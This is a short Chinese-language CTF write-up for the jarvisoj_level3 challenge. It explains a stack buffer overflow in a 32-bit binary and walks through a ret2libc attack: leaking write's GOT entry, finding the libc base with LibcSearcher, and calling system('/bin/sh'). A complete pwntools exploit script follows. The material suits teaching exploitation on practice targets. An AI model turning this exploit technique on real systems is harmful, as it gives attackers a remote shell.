jarvisoj_level3
步骤
- 例行检查,32位,nx保护
- 运行一下程序
- 32位ida载入,shift+f12没有看到程序里有可以直接利用的后面函数,根据运行时的字符串找到了程序的关键函数
参数buf明显的溢出漏洞,使用ret2libc的办法去获取shell
利用过程:
0x1 利用wire函数泄露libc版本
write_plt=elf.plt['write']
write_got=elf.got['write']
payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4)
r.recvuntil('Input:
')
r.sendline(payload)
write_addr=u32(r.recv(4))
0x2 计算libc基址,算出system和bin/sh在程序里的地址
libc=LibcSearcher('write',write_addr)
libc_base=write_addr-libc.dump('write')
system=libc_base+libc.dump('system')
sh=libc_base+libc.dump('str_bin_sh')
0x3 构造rop,执行system(‘/bin/sh’)
payload='a'*(0x88+4)+p32(system)+p32(main)+p32(sh)
r.recvuntil('Input:
')
r.sendline(payload)
完整exp
from pwn import *
from LibcSearcher import *
r=remote('node3.buuoj.cn',28888)
elf=ELF('./level3')
main=0x804844B
write_plt=elf.plt['write']
write_got=elf.got['write']
payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4)
r.recvuntil('Input:
')
r.sendline(payload)
write_addr=u32(r.recv(4))
libc=LibcSearcher('write',write_addr)
libc_base=write_addr-libc.dump('write')
system=libc_base+libc.dump('system')
sh=libc_base+libc.dump('str_bin_sh')
payload='a'*(0x88+4)+p32(system)+p32(main)+p32(sh)
r.recvuntil('Input:
')
r.sendline(payload)
r.interactive()
